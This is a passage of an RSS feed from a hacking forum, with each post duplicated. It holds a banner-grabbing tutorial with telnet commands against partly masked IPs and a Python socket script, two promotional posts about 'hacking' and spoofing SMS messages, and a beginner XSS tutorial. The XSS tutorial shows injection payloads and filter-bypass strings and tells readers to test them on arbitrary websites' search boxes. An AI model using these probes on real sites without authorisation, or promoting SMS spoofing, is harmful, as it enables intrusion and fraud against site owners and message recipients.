If you've never heard of banner grabbing before, then I'll explain it for you simply. Banner grabbing is a technique that you can use to get information about what a target is running(service wise). After you discover what ports are open and being used, you may use this technique to find out what kind of software is being run and what version of that software. In this tutorial we are specifically focusing on 3 services: ftp, ssh, and smtp. The reason why we are only mentioning these three services is because banner grabbing these three are the same and don't change in technique at all, though this technique can be used as a part of others. We will be using telnet to do our banner grabbing because it is already installed and available on most OS's.Alternatively you can use netcat or similar if you prefer. Anyway let's get to it.<br />
<br />
We will need to open up a console and type the following:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>telnet &lt;host&gt; &lt;port&gt;</code></div></div>
<br />
<span style="font-weight: bold;"><span style="font-size: large;">FTP</span></span><br />
An ftp example would be:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>telnet 209.197.248.xx 21</code></div></div>
<br />
which gives us the output:<br />
<img src="http://img707.imageshack.us/img707/5287/ftpc.jpg" border="0" alt="[Image: ftpc.jpg]" /><br />
<br />
Our banner:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>220 ProFTPD 1.3.3d Server (ProFTPD) [209.197.248.xx]</code></div></div>
<br />
<span style="font-weight: bold;"><span style="font-size: large;">SSH</span></span><br />
An ssh example would be:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>telnet 174.36.209.xx 22</code></div></div>
which gives us the output:<br />
<img src="http://img137.imageshack.us/img137/164/sshtat.jpg" border="0" alt="[Image: sshtat.jpg]" /><br />
<br />
Our banner:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze1</code></div></div>
<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">SMTP</span></span><br />
An smtp example would be:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>telnet 206.103.2.xx 25</code></div></div>
<br />
which gives us the output:<br />
<img src="http://imageshack.us/a/img696/9531/smtp.jpg" border="0" alt="[Image: smtp.jpg]" /><br />
<br />
Our banner:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>220 xxxxxxxxxxxxx Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 18 Jun 2012 20:28:44 -0400</code></div></div>
<br />
<br />
I made a simple python script to do this aswell, as an alternative to telnet<br />
<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>#!/usr/bin/env/python3.1<br />
#mls577<br />
#haxme, #suidrewt<br />
<br />
import sys, socket #module imports<br />
if(len(sys.argv) == 3): #argument length check<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;host = sys.argv[1] #host<br />
&nbsp;&nbsp;&nbsp;&nbsp;port = sys.argv[2] #port<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;#create socket<br />
&nbsp;&nbsp;&nbsp;&nbsp;s = socket.socket()<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;try:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;connect = s.connect((host, int(port))) #connect to the host<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;banner = s.recv(1024) #recieve the banner<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(banner) #print the output<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s.close() #close socket<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;except socket.error:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s.close() #close socket<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print("socket error")<br />
<br />
else:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print("usage: program.py &lt;host&gt; &lt;port&gt;")</code></div></div>
</div></div>
<br />
<br />
*As a side note you should know that the accuracy of your results depends on the host, most administrators will manipulate their banner to throw you off.]]></description>
			<content:encoded><![CDATA[*Not sure if this has been posted before but with a quick search I didn't find anything. This is a post from another forum but is my work.<br />
<br />
<span style="font-weight: bold;"><span style="font-size: xx-large;">Banner Grabbing</span></span><br />
<br />
If you've never heard of banner grabbing before, then I'll explain it for you simply. Banner grabbing is a technique that you can use to get information about what a target is running(service wise). After you discover what ports are open and being used, you may use this technique to find out what kind of software is being run and what version of that software. In this tutorial we are specifically focusing on 3 services: ftp, ssh, and smtp. The reason why we are only mentioning these three services is because banner grabbing these three are the same and don't change in technique at all, though this technique can be used as a part of others. We will be using telnet to do our banner grabbing because it is already installed and available on most OS's.Alternatively you can use netcat or similar if you prefer. Anyway let's get to it.<br />
<br />
We will need to open up a console and type the following:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>telnet &lt;host&gt; &lt;port&gt;</code></div></div>
<br />
<span style="font-weight: bold;"><span style="font-size: large;">FTP</span></span><br />
An ftp example would be:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>telnet 209.197.248.xx 21</code></div></div>
<br />
which gives us the output:<br />
<img src="http://img707.imageshack.us/img707/5287/ftpc.jpg" border="0" alt="[Image: ftpc.jpg]" /><br />
<br />
Our banner:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>220 ProFTPD 1.3.3d Server (ProFTPD) [209.197.248.xx]</code></div></div>
<br />
<span style="font-weight: bold;"><span style="font-size: large;">SSH</span></span><br />
An ssh example would be:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>telnet 174.36.209.xx 22</code></div></div>
which gives us the output:<br />
<img src="http://img137.imageshack.us/img137/164/sshtat.jpg" border="0" alt="[Image: sshtat.jpg]" /><br />
<br />
Our banner:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze1</code></div></div>
<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">SMTP</span></span><br />
An smtp example would be:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>telnet 206.103.2.xx 25</code></div></div>
<br />
which gives us the output:<br />
<img src="http://imageshack.us/a/img696/9531/smtp.jpg" border="0" alt="[Image: smtp.jpg]" /><br />
<br />
Our banner:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>220 xxxxxxxxxxxxx Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 18 Jun 2012 20:28:44 -0400</code></div></div>
<br />
<br />
I made a simple python script to do this aswell, as an alternative to telnet<br />
<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;">
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>#!/usr/bin/env/python3.1<br />
#mls577<br />
#haxme, #suidrewt<br />
<br />
import sys, socket #module imports<br />
if(len(sys.argv) == 3): #argument length check<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;host = sys.argv[1] #host<br />
&nbsp;&nbsp;&nbsp;&nbsp;port = sys.argv[2] #port<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;#create socket<br />
&nbsp;&nbsp;&nbsp;&nbsp;s = socket.socket()<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;try:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;connect = s.connect((host, int(port))) #connect to the host<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;banner = s.recv(1024) #recieve the banner<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print(banner) #print the output<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s.close() #close socket<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;except socket.error:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s.close() #close socket<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print("socket error")<br />
<br />
else:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print("usage: program.py &lt;host&gt; &lt;port&gt;")</code></div></div>
</div></div>
<br />
<br />
*As a side note you should know that the accuracy of your results depends on the host, most administrators will manipulate their banner to throw you off.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hacking SMS Messages]]></title>
			<link>http://www.hackcommunity.com/Thread-Hacking-SMS-Messages</link>
			<pubDate>Mon, 10 Jun 2013 16:35:33 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Hacking-SMS-Messages</guid>
			<description><![CDATA[<span style="font-weight: bold;"><span style="font-size: large;"><span style="color: #FF0000;">Hey guys! Wazzap?<br />
Today I want to present you HOW TO HACK SMS MESSAGE ( HOW TO SEND FREE SMS FROM PC TO MOBILE TO ANY COUNTRY)<br />
<br />
I'LL GIVE YOU A VIDEOTUTORIAL AND THE PROGRAM YOU CAN DOWNLOAD FROM THE LINK OF DESCRIPTION! <br />
<br />
VIDEO: <a href="http://www.youtube.com/watch?v=Hn0FEMrwUgY" target="_blank">http://www.youtube.com/watch?v=Hn0FEMrwUgY</a></span></span></span>]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;"><span style="font-size: large;"><span style="color: #FF0000;">Hey guys! Wazzap?<br />
Today I want to present you HOW TO HACK SMS MESSAGE ( HOW TO SEND FREE SMS FROM PC TO MOBILE TO ANY COUNTRY)<br />
<br />
I'LL GIVE YOU A VIDEOTUTORIAL AND THE PROGRAM YOU CAN DOWNLOAD FROM THE LINK OF DESCRIPTION! <br />
<br />
VIDEO: <a href="http://www.youtube.com/watch?v=Hn0FEMrwUgY" target="_blank">http://www.youtube.com/watch?v=Hn0FEMrwUgY</a></span></span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Send free FAKE SMS with any NUMBER worldwide [UNLIMITED]]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Send-free-FAKE-SMS-with-any-NUMBER-worldwide-UNLIMITED</link>
			<pubDate>Sun, 09 Jun 2013 17:25:08 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Send-free-FAKE-SMS-with-any-NUMBER-worldwide-UNLIMITED</guid>
			<description><![CDATA[Hello friends now this is possible im not lying and not dreaming its for free..! free ..!and free..!<br />
You can send <span style="color: #FFD700;"><span style="font-size: large;"><span style="font-weight: bold;">free sms Worldwide With any mobile number</span></span></span>..<br />
<br />
<span style="font-weight: bold;"><span style="color: #FF6347;"><span style="font-size: large;"><div style="text-align: center;">If you what this trick pm me for the instructions..</div></span></span></span>]]></description>
			<content:encoded><![CDATA[Hello friends now this is possible im not lying and not dreaming its for free..! free ..!and free..!<br />
You can send <span style="color: #FFD700;"><span style="font-size: large;"><span style="font-weight: bold;">free sms Worldwide With any mobile number</span></span></span>..<br />
<br />
<span style="font-weight: bold;"><span style="color: #FF6347;"><span style="font-size: large;"><div style="text-align: center;">If you what this trick pm me for the instructions..</div></span></span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Complete Beginner's Guide to XSS(with Pics)]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Complete-Beginner-s-Guide-to-XSS-with-Pics</link>
			<pubDate>Sun, 09 Jun 2013 10:17:37 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Complete-Beginner-s-Guide-to-XSS-with-Pics</guid>
			<description><![CDATA[<div style="text-align: center;">
Note: I will not teach you anything about Cookie Stealing or defacing a website.<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">What is XSS?</span></span><br />
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.<br />
The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (a reflected or non-persistent XSS vulnerability).<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">Types of XSS</span></span><br />
There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS: non-persistent and persistent. <br />
<br />
<span style="font-size: medium;"><span style="text-decoration: underline;">Non-persistent</span></span><br />
The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type.These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.<br />
<br />
<span style="font-size: medium;"><span style="text-decoration: underline;">Persistent</span></span><br />
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">JavaScript and HTML?</span></span><br />
<br />
<span style="font-size: medium;"><span style="text-decoration: underline;">JavaScript</span></span><br />
JavaScript (JS) is an interpreted computer programming language.It was originally implemented as part of web browsers so that client-side scripts could interact with the user, control the browser, communicate asynchronously, and alter the document content that was displayed.(source: Wikipedia)<br />
Most of your attacks will be tested with JS queries.<br />
<br />
<span style="font-size: medium;"><span style="text-decoration: underline;">HTML</span></span><br />
HyperText Markup Language (HTML) is the main markup language for creating web pages and other information that can be displayed in a web browser.<br />
HTML is written in the form of HTML elements consisting of tags enclosed in angle brackets (like &lt;html&gt;), within the web page content. HTML tags most commonly come in pairs like &lt;h1&gt; and &lt;/h1&gt;, although some tags, known as empty elements, are unpaired, for example &lt;img&gt;. The first tag in a pair is the start tag, and the second tag is the end tag (they are also called opening tags and closing tags). In between these tags web designers can add text, tags, comments and other types of text-based content.<br />
(source: Wikipedia)<br />
<br />
In the next 2 - 3 examples I will introduce you to the basics of XSS.<br />
<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">Example 1.</span></span><br />
This is our first example. I will always start with this query so that I can see what is filtered and what isn't.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&lt;script&gt;alert("Hello");&lt;/script&gt;</code></div></div>
<br />
Try to find website that has search box, or any kind of text box where you can inject your script.In the next examples we will use search box. I found mine, entered query and press Search/Go/etc. .(Figure 1. and Figure 2.)<br />
<br />
Figure 1.<br />
<img src="http://s20.postimg.org/ic9jiz9l9/step_1.jpg" border="0" alt="[Image: step_1.jpg]" /><br />
<br />
Figure 2.<br />
<img src="http://s20.postimg.org/sjs2vdvt9/step_2.jpg" border="0" alt="[Image: step_2.jpg]" /><br />
<br />
Now you may didn't get pop-up box, but that's fine. Let's see our source code and see why did we get pop-up box.(Figure 3.)<br />
<br />
Figure 3.<br />
<img src="http://s20.postimg.org/noydx3xhp/looking_at_source.jpg" border="0" alt="[Image: looking_at_source.jpg]" /><br />
<br />
<br />
As you can see our query is underlined with red line.(and will always be in this thread). But why did we get pop-up box. Well answer is simple.<br />
Our code was not filtered in any way and we could run our script.In the next examples we will have to bypass filtrations.<br />
In Figure 4. you can see how filtrated code looks like.<br />
<br />
Figure 4.<br />
<img src="http://s20.postimg.org/c14c2k8ct/encoded.jpg" border="0" alt="[Image: encoded.jpg]" /><br />
In this example, <span style="color: #FF0000;">", &lt;, and &gt;</span> characters were encoded in XML encoding. Sometimes  they will be encoded in HTML encoding, or will be removed.<br />
<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">Example 2.</span></span><br />
So again we will try to enter our query(same as in Example 1.) in search box and press Search/Go/etc. .(Figure 5.)<br />
<br />
Figure 5.<br />
<img src="http://s20.postimg.org/edgxdwabx/step_1.jpg" border="0" alt="[Image: step_1.jpg]" /><br />
<br />
But we didn't get pop-up box saying <span style="color: #FF0000;">Hello</span>. That's because we need to bypass some filtration.Let's see the source code.(Figure 6.)<br />
<br />
Figure 6.<br />
<img src="http://s20.postimg.org/vtb3fl9al/loooking_at_source.jpg" border="0" alt="[Image: loooking_at_source.jpg]" /><br />
<br />
As you can see our query is located between <span style="color: #FF0000;">title</span> tags and our quotes were filtered and interpreted as input.What now? Here's solution. We should close <span style="color: #FF0000;">title</span> tags and try to avoid quotes. Well it's simple to close title tags, in our basic script, at beginning we should add <span style="color: #FF0000;">&lt;/title&gt;</span> so our query would look like this.<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&lt;/title&gt;&lt;script&gt;alert("Hello");&lt;/script&gt;</code></div></div>
<br />
That's fine but not good enough. We still have to avoid quotes. We would do that by using <span style="font-style: italic;">String.fromCharCode</span> encoding. Here is <a href="http://www.wocares.com/noquote.php" target="_blank">link</a> where you can do that.Just select <span style="font-style: italic;">Javascript (String.fromCharCode, unescape)</span> and enter your code that is inside <span style="font-style: italic;">alert</span>. In our example that would be <span style="font-style: italic;">"Hello"</span>.(with quotes).<br />
And at the end our query would look like this.<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&lt;/title&gt;&lt;script&gt;alert(String.fromCharCode(34,72,101,108,108,111,34));&lt;/script&gt;//</code></div></div>
<br />
As you can see we escaped <span style="color: #FF0000;">title</span> tags, we didn't used quotes and at the end we added <span style="color: #FF0000;">//</span> so that everything in that line after that would be interpreted as comment.<br />
And we get our pop-up box saying <span style="color: #FF0000;">Hello</span>. Let's see source code. (Figure 7.)<br />
<br />
Figure 7.<br />
<img src="http://s20.postimg.org/7jb81y72l/runable_source.jpg" border="0" alt="[Image: runable_source.jpg]" /><br />
<br />
<br />
<span style="font-weight: bold;"><span style="font-size: large;">Example 3.</span></span><br />
In this example, we will see other examples, and where else your query can be located. In Figure 8. our query is located in <span style="color: #FF0000;">value</span> tag and <span style="color: #FF0000;">", &lt; and &gt;</span> were not encoded and that is great, because we can escape value tag and then run our script.<br />
<br />
Figure 8.<br />
<img src="http://s20.postimg.org/u1mpyffbh/in_value.jpg" border="0" alt="[Image: in_value.jpg]" /><br />
<br />
So how to escape value? We should close value tag, it's that simple. Here is the code.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"&gt;&lt;script&gt;alert("Hello");&lt;/script&gt;//</code></div></div>
<br />
At beginning of our query we added <span style="color: #FF0000;">"&gt;</span> and that will close value tag.Then or script comes in and at the end <span style="color: #FF0000;">//</span> so that everything in that line after that would be interpreted as comment.And here is the source code.(Figure 9.)<br />
<br />
Figure 9.<br />
<img src="http://s20.postimg.org/f9mlktyrx/in_value_soruce.jpg" border="0" alt="[Image: in_value_soruce.jpg]" /><br />
<br />
Sometimes our query is already located between script tags, so we can remove our script tags from our script.And then our query would look something like this.<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>');alert("Hello");</code></div></div>
<br />
This is just an example, but it will not always look like this. In Figure 10. you can see how query in script tags lookalike.<br />
<br />
Figure 10.<br />
<img src="http://s20.postimg.org/mkdij7psd/source_in_javascript.jpg" border="0" alt="[Image: source_in_javascript.jpg]" /><br />
<br />
And sometimes our query is filtered/encoded in some places and in other places it isn't. In Figure 11. you can see that in <span style="color: #FF0000;">title</span> tags our query isn't filtered and in <span style="color: #FF0000;">value</span> tag it is filtered.<br />
<br />
Figure 11.<br />
<img src="http://s20.postimg.org/twnk2hxe5/looking_at_source.jpg" border="0" alt="[Image: looking_at_source.jpg]" /></div>
<br />
Always look at the source code. If you wanna be good at this, learn JavaScript and HTML.<br />
Recommened: <br />
<a href="http://www.hackcommunity.com/Thread-XSS-Cross-Site-Scripting-Video-Tutorial" target="_blank">XSS - Cross Site Scripting [Video Tutorial]</a> by Xecutor (videos from Infinity Exists)<br />
<a href="http://www.hackcommunity.com/Thread-Tutorial-Basic-xss-tutorial" target="_blank">Basic XSS tutorial</a> by Anima Templi<br />
<a href="http://www.hackcommunity.com/Thread-Complete-XSS-Tutorial?pid=3905" target="_blank">Complete XSS Tutorial</a> by 1234hotmaster <br />
<br />
We came to the end of this tutorial. <img src="images/smilies/dance3.gif" style="vertical-align: middle;" border="0" alt="Dance" title="Dance" /> <img src="images/smilies/dance3.gif" style="vertical-align: middle;" border="0" alt="Dance" title="Dance" /> <img src="images/smilies/dance3.gif" style="vertical-align: middle;" border="0" alt="Dance" title="Dance" /><br />
I hope you like it.]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;">
Note: I will not teach you anything about Cookie Stealing or defacing a website.<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">What is XSS?</span></span><br />
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.<br />
The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (a reflected or non-persistent XSS vulnerability).<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">Types of XSS</span></span><br />
There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS: non-persistent and persistent. <br />
<br />
<span style="font-size: medium;"><span style="text-decoration: underline;">Non-persistent</span></span><br />
The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type.These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.<br />
<br />
<span style="font-size: medium;"><span style="text-decoration: underline;">Persistent</span></span><br />
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">JavaScript and HTML?</span></span><br />
<br />
<span style="font-size: medium;"><span style="text-decoration: underline;">JavaScript</span></span><br />
JavaScript (JS) is an interpreted computer programming language.It was originally implemented as part of web browsers so that client-side scripts could interact with the user, control the browser, communicate asynchronously, and alter the document content that was displayed.(source: Wikipedia)<br />
Most of your attacks will be tested with JS queries.<br />
<br />
<span style="font-size: medium;"><span style="text-decoration: underline;">HTML</span></span><br />
HyperText Markup Language (HTML) is the main markup language for creating web pages and other information that can be displayed in a web browser.<br />
HTML is written in the form of HTML elements consisting of tags enclosed in angle brackets (like &lt;html&gt;), within the web page content. HTML tags most commonly come in pairs like &lt;h1&gt; and &lt;/h1&gt;, although some tags, known as empty elements, are unpaired, for example &lt;img&gt;. The first tag in a pair is the start tag, and the second tag is the end tag (they are also called opening tags and closing tags). In between these tags web designers can add text, tags, comments and other types of text-based content.<br />
(source: Wikipedia)<br />
<br />
In the next 2 - 3 examples I will introduce you to the basics of XSS.<br />
<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">Example 1.</span></span><br />
This is our first example. I will always start with this query so that I can see what is filtered and what isn't.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&lt;script&gt;alert("Hello");&lt;/script&gt;</code></div></div>
<br />
Try to find website that has search box, or any kind of text box where you can inject your script.In the next examples we will use search box. I found mine, entered query and press Search/Go/etc. .(Figure 1. and Figure 2.)<br />
<br />
Figure 1.<br />
<img src="http://s20.postimg.org/ic9jiz9l9/step_1.jpg" border="0" alt="[Image: step_1.jpg]" /><br />
<br />
Figure 2.<br />
<img src="http://s20.postimg.org/sjs2vdvt9/step_2.jpg" border="0" alt="[Image: step_2.jpg]" /><br />
<br />
Now you may didn't get pop-up box, but that's fine. Let's see our source code and see why did we get pop-up box.(Figure 3.)<br />
<br />
Figure 3.<br />
<img src="http://s20.postimg.org/noydx3xhp/looking_at_source.jpg" border="0" alt="[Image: looking_at_source.jpg]" /><br />
<br />
<br />
As you can see our query is underlined with red line.(and will always be in this thread). But why did we get pop-up box. Well answer is simple.<br />
Our code was not filtered in any way and we could run our script.In the next examples we will have to bypass filtrations.<br />
In Figure 4. you can see how filtrated code looks like.<br />
<br />
Figure 4.<br />
<img src="http://s20.postimg.org/c14c2k8ct/encoded.jpg" border="0" alt="[Image: encoded.jpg]" /><br />
In this example, <span style="color: #FF0000;">", &lt;, and &gt;</span> characters were encoded in XML encoding. Sometimes  they will be encoded in HTML encoding, or will be removed.<br />
<br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">Example 2.</span></span><br />
So again we will try to enter our query(same as in Example 1.) in search box and press Search/Go/etc. .(Figure 5.)<br />
<br />
Figure 5.<br />
<img src="http://s20.postimg.org/edgxdwabx/step_1.jpg" border="0" alt="[Image: step_1.jpg]" /><br />
<br />
But we didn't get pop-up box saying <span style="color: #FF0000;">Hello</span>. That's because we need to bypass some filtration.Let's see the source code.(Figure 6.)<br />
<br />
Figure 6.<br />
<img src="http://s20.postimg.org/vtb3fl9al/loooking_at_source.jpg" border="0" alt="[Image: loooking_at_source.jpg]" /><br />
<br />
As you can see our query is located between <span style="color: #FF0000;">title</span> tags and our quotes were filtered and interpreted as input.What now? Here's solution. We should close <span style="color: #FF0000;">title</span> tags and try to avoid quotes. Well it's simple to close title tags, in our basic script, at beginning we should add <span style="color: #FF0000;">&lt;/title&gt;</span> so our query would look like this.<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&lt;/title&gt;&lt;script&gt;alert("Hello");&lt;/script&gt;</code></div></div>
<br />
That's fine but not good enough. We still have to avoid quotes. We would do that by using <span style="font-style: italic;">String.fromCharCode</span> encoding. Here is <a href="http://www.wocares.com/noquote.php" target="_blank">link</a> where you can do that.Just select <span style="font-style: italic;">Javascript (String.fromCharCode, unescape)</span> and enter your code that is inside <span style="font-style: italic;">alert</span>. In our example that would be <span style="font-style: italic;">"Hello"</span>.(with quotes).<br />
And at the end our query would look like this.<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&lt;/title&gt;&lt;script&gt;alert(String.fromCharCode(34,72,101,108,108,111,34));&lt;/script&gt;//</code></div></div>
<br />
As you can see we escaped <span style="color: #FF0000;">title</span> tags, we didn't used quotes and at the end we added <span style="color: #FF0000;">//</span> so that everything in that line after that would be interpreted as comment.<br />
And we get our pop-up box saying <span style="color: #FF0000;">Hello</span>. Let's see source code. (Figure 7.)<br />
<br />
Figure 7.<br />
<img src="http://s20.postimg.org/7jb81y72l/runable_source.jpg" border="0" alt="[Image: runable_source.jpg]" /><br />
<br />
<br />
<span style="font-weight: bold;"><span style="font-size: large;">Example 3.</span></span><br />
In this example, we will see other examples, and where else your query can be located. In Figure 8. our query is located in <span style="color: #FF0000;">value</span> tag and <span style="color: #FF0000;">", &lt; and &gt;</span> were not encoded and that is great, because we can escape value tag and then run our script.<br />
<br />
Figure 8.<br />
<img src="http://s20.postimg.org/u1mpyffbh/in_value.jpg" border="0" alt="[Image: in_value.jpg]" /><br />
<br />
So how to escape value? We should close value tag, it's that simple. Here is the code.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"&gt;&lt;script&gt;alert("Hello");&lt;/script&gt;//</code></div></div>
<br />
At beginning of our query we added <span style="color: #FF0000;">"&gt;</span> and that will close value tag.Then or script comes in and at the end <span style="color: #FF0000;">//</span> so that everything in that line after that would be interpreted as comment.And here is the source code.(Figure 9.)<br />
<br />
Figure 9.<br />
<img src="http://s20.postimg.org/f9mlktyrx/in_value_soruce.jpg" border="0" alt="[Image: in_value_soruce.jpg]" /><br />
<br />
Sometimes our query is already located between script tags, so we can remove our script tags from our script.And then our query would look something like this.<br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>');alert("Hello");</code></div></div>
<br />
This is just an example, but it will not always look like this. In Figure 10. you can see how query in script tags lookalike.<br />
<br />
Figure 10.<br />
<img src="http://s20.postimg.org/mkdij7psd/source_in_javascript.jpg" border="0" alt="[Image: source_in_javascript.jpg]" /><br />
<br />
